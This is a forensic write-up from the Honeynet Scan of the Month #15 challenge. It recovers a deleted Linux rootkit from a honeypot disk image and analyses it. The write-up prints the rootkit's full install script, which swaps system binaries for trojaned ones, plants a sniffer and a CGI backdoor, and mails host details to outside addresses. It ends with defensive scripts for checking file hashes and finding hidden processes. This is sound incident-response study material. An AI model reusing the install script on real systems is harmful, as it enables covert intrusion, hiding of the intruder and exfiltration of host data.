From gmeltser@atstake.com Tue May 22 22:39:18 2001
Date: Tue, 15 May 2001 11:49:49 -0500
From: Gene Meltser
To: project@honeynet.org
Subject: Honeynet "Scan of the month" #15 submission

Lance,

Here is my submission of analysis for the Scan of the Month #15. The recovered rootkit tarball lk.tgz is included in the email.

Gene Meltser
@stake

[ Part 2: "Attached Text" ]

Honeynet Scan of the Month #15
Linux rootkit compromise

TOC
--------------------------------------
@ Introduction
@ Tools Used
@ Analysis
---------------------------------------

@ Introduction

On March 15, 2001 a Linux honeypot was successfully compromised; a rootkit was downloaded onto it and then deleted. The goal is to find and recover the deleted rootkit, showing the steps by which the rootkit was identified and recovered, and to show which files make up the deleted rootkit.

The analysis began by downloading the honeynet.tar.gz file, verifying the md5 hash, uncompressing the image and verifying the hash again. The resulting filesystem layout and the md5 hashes are as follows:

honeypot.hda8.dd    /

MD5 Hashes:
MD5 (honeynet.tar.gz)  = 0dff8fb9fe022ea80d8f1a4e4ae33e21
MD5 (honeypot.hda8.dd) = 5a8ebf5725b15e563c825be85f2f852e

The resulting file, honeypot.hda8.dd, was mounted read-only on a RedHat 7.0 system:

#mount -o ro,nodev,noexec,loop /honeypot.hda8.dd /linux

All of the analysis was performed on the resulting mounted filesystem under /linux and on the honeypot.hda8.dd image file.

@ Tools Used

The tools used in the analysis:

The Coroner's Toolkit 1.06 by Wietse Venema - www.porcupine.org/forensics/tct.html
TCTUTILs 1.00 by Brian Carrier - www.cerias.purdue.edu/homes/carrier/forensics/
Autopsy Forensic Browser by Brian Carrier - www.cerias.purdue.edu/homes/carrier/forensics/
Standard unix commands, such as strings(1), grep(1), etc.
@ Analysis

The analysis began by installing and configuring TCT, TCTUTILs and the Autopsy Forensic Browser on the analysis machine, and accessing the honeypot.hda8.dd image through the Forensic Browser. Looking for deleted files on the image, an odd deleted file called lk.tgz is noticed immediately under the / partition. Since we are looking for a deleted rootkit, files that are not part of the OS are of interest to us.

The file is recovered from inode 23 using icat:

#tct-1.06/bin/icat -v honeypot.hda8.dd 23 > lk.tgz
#file lk.tgz
gzip compressed data, deflated, last modified: Fri Mar 2 22:09:06 2001, os: Unix
#

The file is compressed, and appears to be the original rootkit package, presumably downloaded by the intruder. Examining the recovered rootkit, it contains the following files:

-----------------------------------------------------------------------------------------
/last
drwxr-xr-x   2 1031     users      4096 May 10 01:46 .
drwxr-xr-x   3 root     root       4096 May 10 01:10 ..
-rwxr-xr-x   1 1031     users      1345 Sep  9  1999 cleaner
-rwxr-xr-x   1 1031     users     19840 Feb 26 10:23 ifconfig
-rw-r--r--   1 1031     users      3278 Jan 27 10:11 inetd.conf
-rwx------   1 1031     users      3713 Mar  2 22:08 install
-rwxr-xr-x   1 1031     users      4620 Feb 26 10:23 last.cgi
-rwx------   1 1031     users      7165 Feb 26 10:22 linsniffer
-rwx------   1 1031     users        75 Feb 26 10:24 logclear
-rwxr-xr-x   1 1031     users        79 Feb 26 10:28 lsattr
-rwxr-xr-x   1 1031     users    632066 Feb 26 09:46 mkxfs
-rwxr-xr-x   1 1031     users     35300 Feb 26 10:23 netstat
-rw-r--r--   1 1031     users         1 Feb 26 10:29 pidfile
-rwxr-xr-x   1 1031     users     33280 Feb 26 10:23 ps
-rw-r--r--   1 root     root        708 Mar  2 22:05 s
-rwxr-xr-x   1 1031     users      4060 Feb 26 10:22 sense
-rw-r--r--   1 1031     users     11407 Jan 27 10:11 services
-rwx------   1 1031     users      8268 Feb 26 10:22 sl2
-rwxr-xr-x   1 1031     users    611931 Feb  8  2002 ssh
-rw-r--r--   1 1031     users       880 Oct 22  2000 ssh_config
-rw-------   1 1031     users       540 Oct 22  2000 ssh_host_key
-rw-r--r--   1 1031     users       344 Oct 22  2000 ssh_host_key.pub
-rw-------   1 1031     users       512 Oct 22  2000 ssh_random_seed
-rw-r--r--   1 1031     users       688 Feb 26 10:29 sshd_config
-rwxr-xr-x   1 1031     users     53588 Feb 26 10:23 top
-----------------------------------------------------------------------------------------

Generally, a rootkit consists of the following components:

1. Log cleaner
2. Sniffer
3. Back door
4. Attack tools/modified system utilities

Examining the files included in lk.tgz, we note the following suspicious components:

cleaner: This is a shell script that cleans the log files, erasing the evidence of the intrusion. Segment from the cleaner script:

. . .
echo "${BLK}* ${DWHI}Cleaning logs.. This may take a bit depending on the size of the logs.${RES}"
. . .

linsniffer: This is the sniffer executable. It logs network activity to a file called tcp.log, as is evident from running linsniffer through strings(1):

. . .
tcp.log
cant open log
. . .

Back Door: In this case, the back door possibly exists in last.cgi, which appears to be an executable with an HTTP front end that possibly allows remote command execution. Partial results of running last.cgi through strings(1):

. . .
%s

%s


Command output: [%s]

. . .

Attack tools/modified system binaries: The possible rootkit contains several binaries that are installed by the installation script "install" (outlined below). The binaries installed in this process are listed and analyzed further below. The recovered installation script "install", included in lk.tgz, is shown below:

----------------------------------------------------------------------------------------
#!/bin/sh
clear
unset HISTFILE
echo "********* Instalarea Rootkitului A Pornit La Drum *********"
echo "********* Mircea SUGI PULA ********************************"
echo "********* Multumiri La Toti Care M-Au Ajutat **************"
echo "********* Lemme Give You A Tip : **************************"
echo "********* Ignore everything, call your freedom ************"
echo "********* Scream & swear as much as you can ***************"
echo "********* Cuz anyway nobody will hear you and no one will *"
echo "********* Care about you **********************************"
echo
echo
chown root.root *
if [ -f /usr/bin/make ]; then
echo "Are Make !"
else
echo "Nu Are Make !"
fi
if [ -f /usr/bin/gcc ]; then
echo "Are Gcc !"
else
echo "Nu Are Gcc !"
fi
if [ -f /usr/sbin/sshd/ ]; then
echo "Are Ssh !"
else
echo "Nu Are Ssh !"
fi
echo -n "* Inlocuim nestat ... alea alea "
rm -rf /sbin/ifconfig
mv ifconfig /sbin/ifconfig
rm -rf /bin/netstat
mv netstat /bin/netstat
rM -rf /bin/ps
mv ps /bin/ps
rm -rf /usr/bin/top
mv top /usr/bin/top
cp -f mkxfs /usr/sbin/
echo "* Gata..."
echo -n "* Dev... "
echo
echo
touch /dev/rpm >/dev/rpm
echo "3 sl2" >>/dev/rpm
echo "3 sshdu" >>/dev/rpm
echo "3 linsniffer" >>/dev/rpm
echo "3 smurf" >>/dev/rpm
echo "3 slice" >>/dev/rpm
echo "3 mech" >>/dev/rpm
echo "3 muh" >>/dev/rpm
echo "3 bnc" >>/dev/rpm
echo "3 psybnc" >> /dev/rpm
touch /dev/last >/dev/last
echo "1 193.231.139" >>/dev/last
echo "1 213.154.137" >>/dev/last
echo "1 193.254.34" >>/dev/last
echo "3 48744" >>/dev/last
echo "3 3666" >>/dev/last
echo "3 31221" >>/dev/last
echo "3 22546" >>/dev/last
echo "4 48744" >>/dev/last
echo "4 2222" >>/dev/last
echo "* Gata"
echo "* Facem Director...Si Mutam Alea.. "
mkdir -p /dev/ida/.drag-on
mkdir -p /dev/ida/".. "
echo "* Copiem ssh si alea"
cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.drag-on/
cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/".. "
rm -rf linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed
touch /dev/ida/.drag-on/tcp.log
touch /dev/ida/".. "/tcp.log
cp -f inetd.conf /etc
cp -f services /etc
killall -HUP inetd
echo
echo
echo
echo "* Adaugam In Startup:) ..."
rm -rf /usr/bin/lsattr
echo "/usr/bin/lsattr -t1 -X53 -p" >> /etc/rc.d/rc.sysinit
echo >> /etc/rc.d/rc.sysinit
cp -f lsattr /usr/bin/
chmod 500 /usr/bin/lsattr
chattr +i /usr/bin/lsattr
/usr/bin/lsattr
sleep 1
if [ -d /home/httpd/cgi-bin ]
then
mv -f last.cgi /home/httpd/cgi-bin/
fi
if [ -d /usr/local/httpd/cgi-bin ]
then
mv -f last.cgi /usr/local/httpd/cgi-bin/
fi
if [ -d /usr/local/apache/cgi-bin ]
then
mv -f last.cgi /usr/local/apache/cgi-bin/
fi
if [ -d /www/httpd/cgi-bin ]
then
mv -f last.cgi /www/httpd/cgi-bin/
fi
if [ -d /www/cgi-bin ]
then
mv -f last.cgi /www/cgi-bin/
fi
echo "* Luam Informatiile dorite ..."
echo "* Info : $(uname -a)" >> computer
echo "* Hostname : $(hostname -f)" >> computer
echo "* IfConfig : $(/sbin/ifconfig | grep inet)" >> computer
echo "* Uptime : $(uptime)" >> computer
echo "* Cpu Vendor ID : $(cat /proc/cpuinfo|grep vendor_id)" >> computer
echo "* Cpu Model : $(cat /proc/cpuinfo|grep model)" >> computer
echo "* Cpu Speed: $(cat /proc/cpuinfo|grep MHz)" >> computer
echo "* Bogomips: $(cat /proc/cpuinfo|grep bogomips)" >> computer
echo "* Spatiu Liber: $(df -h)" >> computer
echo "* Gata ! Trimitem Mailul ...Asteapta Te Rog "
cat computer | mail -s "placinte" last@linuxmail.org
cat computer | mail -s "roote" bidi_damm@yahoo.com
echo "* Am trimis mailul ... stergem fisierele care nu mai trebuie ."
echo
echo
echo "* G A T A *"
echo
echo "* That Was Nice Last "
cd /
rm -rf last lk.tgz computer lk.tar.gz
-------------------------------------------------------------------------------------

This appears to be a rootkit, because it exhibits the four characteristics of a rootkit defined above. Further, the installation script above exposes the context in which the uncompressed binaries are used. The rootkit install replaces the following binaries with its trojaned versions:

/sbin/ifconfig
/bin/netstat
/bin/ps
/usr/bin/top
/etc/inetd.conf
/etc/services
/usr/bin/lsattr

Install also adds:

/usr/sbin/mkxfs
/dev/rpm (presumably the trojaned process file, more on that below..)
/dev/last (presumably allowed/denied/non-logged IPs for the backdoor, more on that below..)
/home/httpd/cgi-bin/last.cgi (if directory exists)
/usr/local/httpd/cgi-bin/last.cgi (if directory exists)
/usr/local/apache/cgi-bin/last.cgi (if directory exists)
/www/httpd/cgi-bin/last.cgi (if directory exists)
/www/cgi-bin/last.cgi (if directory exists)

The install script installs its binaries in both /dev/ida/.drag-on and /dev/ida/".. ", consisting of:

linsniffer
logclear
sense
sl2
mkxfs
s
ssh_host_key
ssh_random_seed

@ Bonus Question: Was the rootkit actually installed? How do you know?
The rootkit was installed on the compromised system. Following the rootkit's installation script, the following directories are found on the system, containing the trojaned binaries:

/dev/ida/.. /
/dev/ida/.drag-on/

Furthermore, closer examination of the potentially trojaned binaries found on the system yields more evidence of an installed rootkit. Below are some of the MD5 hashes of the original files included in lk.tgz, compared with the files recovered from the honeypot.hda8.dd image:

--------------------------------------------------------------------------------
FILE        ORIGINAL FILE HASH                  HASH, AS FOUND ON IMAGE
--------------------------------------------------------------------------------
cleaner     12e8748c19abe7a44e67196c22738e9b    12e8748c19abe7a44e67196c22738e9b
ps          7728c15d89f27e376950f96a7510bf0f    7728c15d89f27e376950f96a7510bf0f
top         8ff0939cd49a0b2ef3156c7876afca4b    8ff0939cd49a0b2ef3156c7876afca4b
ifconfig    086394958255553f6f38684dad97869e    086394958255553f6f38684dad97869e
netstat     2b07576213c1c8b942451459b3dc4903    2b07576213c1c8b942451459b3dc4903
ssh         21ed3ca31a9c9b51a757f1644e26f2f7    21ed3ca31a9c9b51a757f1644e26f2f7
lsattr      dfb2eeea2a5ba23eb6a2b9d0cff9d82f    dfb2eeea2a5ba23eb6a2b9d0cff9d82f
--------------------------------------------------------------------------------

Finding files from the lk.tgz archive on the filesystem is a good indication that the rootkit was installed on the compromised system. We also find the /dev/last and /dev/rpm files on the compromised system, furthering our hypothesis that the rootkit was installed. The files are plain text files, used in a similar way to the Linux Rootkit 4 ROOTKIT_ADDRESS_FILE and ROOTKIT_PROCESS_FILE.
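The hash comparison above can be automated. The script below is an added example written for this page, not part of the submission or of any tool it uses: it takes the destination paths from the install script shown earlier (the replaced system binaries plus the copies in the two /dev/ida directories), hashes each file from the extracted lk.tgz, and reports whether the file at the corresponding path on the read-only mounted image matches, differs or is missing. The demo tree it builds in a temporary directory is constructed sample data, not content from the image.

```python
#!/usr/bin/env python3
"""Compare files from the recovered lk.tgz with the paths where its install
script places them on a mounted forensic image. Added example; the demo tree
built by build_demo_tree() is constructed data, not the honeypot image."""
import hashlib
import os
import tempfile

# Paths relative to the image mount point, as written by the install script.
REPLACED = {
    "ifconfig": "sbin/ifconfig", "netstat": "bin/netstat", "ps": "bin/ps",
    "top": "usr/bin/top", "mkxfs": "usr/sbin/mkxfs", "lsattr": "usr/bin/lsattr",
    "inetd.conf": "etc/inetd.conf", "services": "etc/services",
}
# The two hidden directories and the files copied into both of them.
HIDDEN_DIRS = ["dev/ida/.drag-on", "dev/ida/.. "]
HIDDEN_FILES = ["linsniffer", "logclear", "sense", "sl2", "mkxfs", "s",
                "ssh_host_key", "ssh_random_seed"]


def install_targets():
    """Map each rootkit file name to every path the install script writes it to."""
    targets = {name: [path] for name, path in REPLACED.items()}
    for name in HIDDEN_FILES:
        targets.setdefault(name, []).extend(f"{d}/{name}" for d in HIDDEN_DIRS)
    return targets


def md5_file(path):
    """MD5 of a file, read in chunks so large binaries (mkxfs, ssh) are fine."""
    h = hashlib.md5()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def compare(rootkit_dir, image_root):
    """Return {relative image path: 'match' | 'differs' | 'missing'} for every
    install target whose source file exists in the extracted rootkit."""
    results = {}
    for name, paths in install_targets().items():
        src = os.path.join(rootkit_dir, name)
        if not os.path.isfile(src):
            continue
        src_hash = md5_file(src)
        for rel in paths:
            dst = os.path.join(image_root, rel)
            if not os.path.isfile(dst):
                results[rel] = "missing"
            elif md5_file(dst) == src_hash:
                results[rel] = "match"
            else:
                results[rel] = "differs"
    return results


def build_demo_tree():
    """Constructed sample: a fake extracted rootkit and a fake image mount in
    which ps was replaced, top was not, and linsniffer sits in one hidden dir."""
    root = tempfile.mkdtemp(prefix="sotm15_")
    kit, img = os.path.join(root, "last"), os.path.join(root, "image")
    os.makedirs(kit)
    for name, data in {"ps": b"trojaned ps", "top": b"trojaned top",
                       "linsniffer": b"sniffer"}.items():
        with open(os.path.join(kit, name), "wb") as fh:
            fh.write(data)
    for rel, data in {"bin/ps": b"trojaned ps", "usr/bin/top": b"original top",
                      "dev/ida/.drag-on/linsniffer": b"sniffer"}.items():
        full = os.path.join(img, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(data)
    return kit, img


if __name__ == "__main__":
    # Real use: compare("/path/to/extracted/last", "/linux") against the mount.
    kit, img = build_demo_tree()
    for rel, status in sorted(compare(kit, img).items()):
        print(f"{status:8} {rel}")
```

Run against the real mount point (/linux in this analysis) the "match" rows reproduce the table above; "differs" rows are worth a second look, since a binary may have been rebuilt or modified after installation, and "missing" rows for the /dev/ida copies show which of the two hidden directories were actually populated.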
/dev/rpm contains what appears to be a list of binaries, presumably for the trojaned operation of ps and top, and /dev/last contains a list of IPs, presumably for the functionality of the installed back doors, where access to the compromised system from/to the listed IPs and ports is not logged by the trojaned netstat.

In further analysis, running the ps binary through strings, we notice that the binary is linked with Libc5. Sample output from running "strings /linux/bin/ps | more":

#strings /linux/bin/ps | more
/lib/ld-linux.so.1  -> libc.so.5
_DYNAMIC
. . .

Original binaries that come with the RH6.2 distribution are linked with libc.so.6, thus indicating that this is a trojaned executable.

Also, running the ifconfig binary through strings I notice that the string PROMISC is not present in the binary. This is a good indication that this is a trojaned binary, unable to report that it is in promiscuous mode.

Gene Meltser
@stake
5/15/2001

[ Part 3, Application/OCTET-STREAM (Name: "lk.tgz") 713KB. ]
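The /dev/rpm and /dev/last files described above are the rootkit's hide lists, and because this kit replaces ps and netstat in userland rather than patching the kernel, /proc remains a trustworthy source to check them against. The script below is an added example written for this page, not part of the submission: it parses both files, and cross-checks a process list read from /proc against the output of the (suspect) ps to flag processes that ps omits and whether the hide list explains each omission. The sample file contents are taken from the install script; the process listings are constructed. The meaning assigned to the numeric codes (3 in /dev/rpm = hide by process name; in /dev/last, 1 = address prefix and 3/4 = ports) is an assumption matching the page's "presumably" reading of these files as LRK4-style process and address files, not something the page confirms.

```python
#!/usr/bin/env python3
"""Parse the rootkit's /dev/rpm and /dev/last hide lists and detect processes
that the trojaned ps omits. Added example; code meanings are assumptions."""
import os
import re

# Contents as written by the install script on the page.
RPM_SAMPLE = ("3 sl2\n3 sshdu\n3 linsniffer\n3 smurf\n3 slice\n"
              "3 mech\n3 muh\n3 bnc\n3 psybnc\n")
LAST_SAMPLE = ("1 193.231.139\n1 213.154.137\n1 193.254.34\n3 48744\n"
               "3 3666\n3 31221\n3 22546\n4 48744\n4 2222\n")
# Constructed listings: what /proc shows versus what the suspect ps prints.
PROC_SAMPLE = ["init", "inetd", "sshd", "linsniffer", "sl2", "bash"]
PS_SAMPLE = ["init", "inetd", "sshd", "bash"]


def parse_hide_list(text):
    """Each line is '<code> <value>'; returns [(code, value), ...], skipping
    anything that does not fit that shape."""
    entries = []
    for line in text.splitlines():
        m = re.fullmatch(r"\s*(\d+)\s+(\S+)\s*", line)
        if m:
            entries.append((int(m.group(1)), m.group(2)))
    return entries


def hidden_names(rpm_text):
    # Assumption: code 3 means "hide processes with this name" (LRK4-style).
    return {v for c, v in parse_hide_list(rpm_text) if c == 3}


def hidden_prefixes_and_ports(last_text):
    # Assumption: code 1 is an address prefix, codes 3 and 4 are ports.
    entries = parse_hide_list(last_text)
    prefixes = {v for c, v in entries if c == 1}
    ports = {int(v) for c, v in entries if c in (3, 4) and v.isdigit()}
    return prefixes, ports


def connection_is_hidden(last_text, remote_addr, local_port, remote_port):
    """Would a netstat honouring /dev/last (under the assumed semantics) omit
    this connection? Useful for deciding which connections to pull from
    firewall or sniffer logs instead of the host."""
    prefixes, ports = hidden_prefixes_and_ports(last_text)
    addr_hit = any(remote_addr.startswith(p + ".") for p in prefixes)
    return addr_hit or local_port in ports or remote_port in ports


def processes_from_proc(proc_root="/proc"):
    """Read process names straight from /proc/<pid>/comm, bypassing ps
    (comm exists on Linux 2.6.33 and later)."""
    names = []
    if not os.path.isdir(proc_root):
        return names
    for pid in os.listdir(proc_root):
        if not pid.isdigit():
            continue
        try:
            with open(os.path.join(proc_root, pid, "comm")) as fh:
                names.append(fh.read().strip())
        except OSError:
            continue
    return names


def find_hidden(proc_names, ps_names, rpm_text):
    """Names present in /proc but absent from ps output, annotated with
    whether /dev/rpm accounts for the omission."""
    listed = hidden_names(rpm_text)
    missing = set(proc_names) - set(ps_names)
    return {n: ("listed in /dev/rpm" if n in listed else "not in hide list")
            for n in missing}


if __name__ == "__main__":
    for name, why in sorted(find_hidden(PROC_SAMPLE, PS_SAMPLE, RPM_SAMPLE).items()):
        print(f"hidden from ps: {name:12} ({why})")
    print("hidden names:", sorted(hidden_names(RPM_SAMPLE)))
    print("hidden prefixes/ports:", hidden_prefixes_and_ports(LAST_SAMPLE))
```

A name that is missing from ps but not in the hide list is the more interesting finding: it means the discrepancy is not explained by this rootkit's configuration and something else is filtering the process table.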